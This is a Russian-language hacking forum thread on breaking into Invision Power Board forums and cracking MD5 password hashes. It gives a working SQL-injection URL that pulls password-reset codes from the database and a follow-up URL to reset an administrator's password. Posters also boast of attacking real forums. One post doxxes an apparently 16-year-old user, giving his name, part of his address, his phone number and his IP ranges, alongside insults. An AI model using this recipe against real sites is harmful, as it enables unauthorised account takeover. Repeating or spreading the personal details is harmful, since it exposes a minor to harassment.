• XSS.stack #1 – первый литературный журнал от юзеров форума

Взлом Invision Power Board

надо на своем компе имеющим доступ в инет поднять Appache c PHP, скопировать скрипты в htdocs директорию апачи и набирать localhost/имяскрипта.php в браузере. естессно в скриптах надо выставить переменные для своего случая, в коментариях к моему первому скрипту написано какие а в скрипте описаном выше я перед самим скриптом написал че там менять надо.
Ага понел, а вот скажите вообще на форуме http://www.wrg.ru/forums/index.php такой скрипт применяется? и вообще взломать этот форум возможно или нет?
кстати в последнем скрипте ошибка, он должен выглядеть так:
а этот где применять в посте? просто такой в строку не вставиш.
 
Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc
инструкции - на форуме. вообщем найди код для получения хешей пользователей. в 1.3 можно подобрать пароль просто при помощи MD5inside | Passwordspro
 
Ага сенкс все кто помогал, огромный, получилось
дыра в MySQL! Получилось изменить свой пороль, проще некуда showuser="№">username<POST&CODE и т.д Моя цель зайти в под админом. Помогите, и сенкс за всё, я кажись начел понимать Хаккерство :holloween:
Могу дать полную инфу о дыре.
 
Soldat, ничего не понял. :huh: :huh:

ковырялся в исходниках и достаточно полезную вещь. по крайней мере, без особого геморроя поменять пароль на пользователя-админа можно так:
заходим в восстановление пароля, выбираем в качестве пользователя ник админа. ессно, высылается письмо с кодом. потом заходим в любой топик, жмем кнопку "цитата"(форма ответа с прикрепленным сообщением, как обычно) и подставляем по схеме
http://форум/index.php?act=Post&CODE=02&f=хх&t=хх&qpid=хх)+UNION+select+1,1,1,1,1,1,1,1,1,1,CONCAT(CHAR(58),regid%20,CHAR(58),regcode,CHAR(58),ip_address),1,1,1,1,1,1,1,1,1+from%20+ibf_reg_antispam+/*
там находим код для смены пароля (мд5, 32 символа) соответствующий своему ип.

http://форум/index.php?act=Reg&CODE=lostpassform&uid=номер пользователя с админ-правами&aid=полученный код
вбиваем новый пароль.
вуаля, вообщем-то. :tease:
а как стирать код для смены пароля догадайтесь сами ;).
в противном случае, админ может так же вернуть пароль т.к ему на почту тоже будет выслан нужный код.
сам способ пока не проверял - негде. если сработает, сообщите... или дайте форум версии 2.0+ с уязвимостью :)

а еще - я все-таки очень хочу получить движок версии 2.0.1.
email дам через РМ :)
 
Представляю посты в скором времени: "Народ, убейте этого урода! Он мне не нравится!" Прочитали киллеры и убили... :swoon2: А вы не задумались кто вас просит об этом? Братцы, ну сколько можно? Приходит ублюдок на форум к специалистам и говорит, меня обижают. Или еще лучше, от моего имени хаит, что мол все вы нехорошие и т.д. И "добрые дяди" ведутся на поводу у малолетки.
Теперь кратко суть проблемы. Парня под ником Solder наверняка зовут
Топчий Пётр.
Возраст : 16 лет
Родился : 21 Сентября
Адрес: Россия.г. Колпино, Машиностроителей * кв ***
тел. 482-**-**
http://www.nokoll666.narod.ru/ - хомяк этого дауна
Известен под ником Nokoll и прочее. В общем обыкновенный недоделок, с одной извилиной, сам взломать форум он не может, поэтому просит всегда шарящих ребят сделать за него это.
ВОТ ТУТ ОН ПОДСТАВИЛ РЕБЯТ КАК ВАС
ВОТ ТУТ ОТ МОЕГО ИМЕНИ ОСКОРб**ЕТ НАРОД
Вот его ip 212.48.207.* или 195.131.94.*

Всем желающим могу дать его точные координаты в ПМ.
 
сам взломать форум он не может, поэтому просит всегда шарящих ребят сделать за него это.

ну а за него никто делать ниче и не собираецца :D , советы можем давать начинающим занимацца взломом, а за ламеров чё-то делать - кому оно надо, разве что за некислое денежное вознаграждение :D
 
в конечном счете, тут информация не только для атаки, но и для защиты.
 
Вот те на! Эта сволочь и здесь!

Народ, на форуме альфы этот подонок никого не уговаривал сломать форум, а наезжал на всех кого можно, в том числе и на меня!

Это я сломал форум wrg.ru, именно потому что эта тварь прикинулась Aiwan`ом!
Не верьте Solder`y! Забаньте его!!!
 
всетки идет обсуждение взлома а не идиётов. подчистить бы тему, а? :)
 
жду %) неплохо бы вместе с общим описанием процесса. рас уж такой способ :)
 
Exil, я вот решил найти MD5Inside что ты рекомендовал, нашел, но там еще была указана страничка автора программы http://www.insidepro.com/ и я решил пойти туда - вдруг там более свежая версия :) но вместо неё на этой страничке обнаружил программу PasswordsPro, на сайте этом же нашел статью об оптимизациях алгоритма MD5 на ассемблере, применении MMX и т.п.

Еще заметил что у нас как-то мышление сходицца в чем-то с автором этой программы - у него там есть статья про циклический инкремент паролей - это метод перебора такой - http://www.insidepro.com/doc/003e.shtml

так вот я когда писал тот код на PHP что я тут выложил я как-то сам этот же метод и применил а статью про него вот тока счас прочитал :D , единственное отличие что у него в конце таблицы символов 0х00 стоит и он так определяет что нужен перенос в следующем разряде, я же просто сравниваю полученый из функции nextSymbol новый символ и старый и если новый меньше старого то делаю вывод что нужен перенос в старший разряд, потому у меня там и требование что все символы в таблице должны быть четко в порядке возрастания а у автора PasswordsPro можно допускать и такое: "abcdzytws" т.е. в произвольном порядке.

Я тут еще на С++ начал писать свою подбиралку паролей и заметил что например пароль jopa20 из его хэша находицца в разы быстрее чем пароль 02apoj, т.к. у меня сначала идут цифры в таблице а потом буквы. А вот PasswordsPro ищет оба пароля одинаково долго, возможно он просто не успокаиваецца первым найденым паролем а перебирает все варианты. Непонятно зачем только, я много 5-6 символьных паролей перепробовал и на их хэши всегда только один пароль находился, потому я делаю выход из поиска при первом же результате. Хотя может при слишком длинных паролях будет и несколько результатов? Надо чекбокс предусмотреть - типа перебирать до последнего или выходить при первом же результате :) .

И если выходить при первом же результате, то оптимизировать можно не только код программы, но и порядок следования символов в таблице - это даст намного большее ускорение чем оптимизация кода, только для этого надо где-то взять невъебенную базу реальных паролей которые насобирали какие-нить хакеры и провести статистику встречаемости символов в паролях и в соответствии с ней построить таблицу символов для подбора паролей.
 
обнаружил программу PasswordsPro,
Да, программа от тогоже автора. Она считается лучшей, но все равно 10-символьный пасс за час ты не подберешь
Надо чекбокс предусмотреть - типа перебирать до последнего или выходить при первом же результате
Зачем. Если один и тот же кэш является шифром нескольких паролей, то подойдут все пароли. Механизм таков: двиг шифрует МД5 и сравнивает с МД5 из БД, а если 2 пасса дадут один и тот же МД5, то они оба подойдут...

И вообще уже найден способ найти пасс от любого MD5 за 8 часов, только никакого релиза и ничего даже и не пахнет.
Один мой друг из Израиля говорил, что в торрент сети нашел большую прогу (весит гиг), которая за сутки взломает любой хэш, но из-за некоторых языковых барьеров я не добился ничего хорошего.
 
Зачем. Если один и тот же кэш является шифром нескольких паролей, то подойдут все пароли. Механизм таков: двиг шифрует МД5 и сравнивает с МД5 из БД, а если 2 пасса дадут один и тот же МД5, то они оба подойдут...

И вообще уже найден способ найти пасс от любого MD5 за 8 часов, только никакого релиза и ничего даже и не пахнет.
Один мой друг из Израиля говорил, что в торрент сети нашел большую прогу (весит гиг), которая за сутки взломает любой хэш, но из-за некоторых языковых барьеров я не добился ничего хорошего.

ну автор PasswordsPro же зачем-то перебирает до конца, или не знаю че он там делает, но например моя прога находит пароль jopa20 по его хэшу меньше чем за минуту, а PasswordsPro убивает на это 7 минут и это при том что скорость перебора паролей у неё в 2 раза больше чем у моего неоптимизированного кода написанного на скорую руку, может это связано с тем, что в таблице символов у меня первыми идут цифры а потом маленькие латинские буквы, а в PasswordsPro наоборот, но тогда он должен быстро находить пароль 02apoj чего не происходит. Мой код же 02apoj ищет минут 15.

А другой способ это че-то основаное на коллизиях MD5? Я вот статью про них нашел но пока еще не читал, видно там этот гигабайт в основном всякие таблицы занимают предвычисленные.
 
DeathOfPower
Вывалил бы свою программу, желательно с сорсами. Поглядим что там интересного. И вообще к IPB это не имеет никакого отношения. Заведи отдельную тему где все подробно распиши.
 
Вывалил бы свою программу, желательно с сорсами. Поглядим что там интересного. И вообще к IPB это не имеет никакого отношения. Заведи отдельную тему где все подробно распиши.

да че вываливать если еще она не готова для широкого использования надо приделывать ещё возможность менять таблицу символов из которых пароль подбирается, задавать макс. длину пароля и т.п. а также вешать подбирающий алгоритм на отдельный тред и семафоры ставить чтобы его можно было останавливать и запускать заново как в PasswordsPro... эх, было б еще времени побольше, а то урывками делаю выкроив на работе свободный часик и то не каждый день получаецца :( . И особенного там ниче нет это вариант того что я тут на PHP написанное уже вываливал, тока на MS Visual C++ сделаное как обычная прога, даже не оптимизировал код еще, так на скорую руку сляпал. Теперь буду постепенно выкраивать время и до ума доводить. Хочу приделать возможность взлома "солёных" хэшей, конечно для этого надо знать сам хэш и salt к нему.

Ну хватит офтопика, теперь по теме :). Решил я вчера проверить метод SQL-injection на реальном форуме в инете (до этого тренировался на установленом на своём компе :) ) ну утянул хэши паролей админов, запустил PasswordsPro думаю оставлю на ночь мож если повезет и пароль будет не длинный то че-нить подберецца... и тока запустил как мгновенно получил результат!!! у одного админа пароль - stepa а у другого ваще 555 :))))))))))))))))))))) я в ахуе :D
в общем потому как одного чувака с этого форума я знаю я там ниче не косячил а просто отправил этим "админам" от имени их же самих приватные сообщения о необходимости срочно поменять пароли на нормальные :D .

Кстати в IPB 2.0 и выше хэш тянется, только это не тот хэш из которого можно получить пароль. Этот хэш генерится там специально для "автологина" - генерят случайную 60-символьную строку и ей делают MD5. А вот хэш и salt настояшего пароля храняцца уже в другой таблице базы (members_converge) в полях converge_pass_hash и converge_pass_salt соответственно. И тут уже нужен другой подход к взлому. Вот седня над этим подумаю B)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх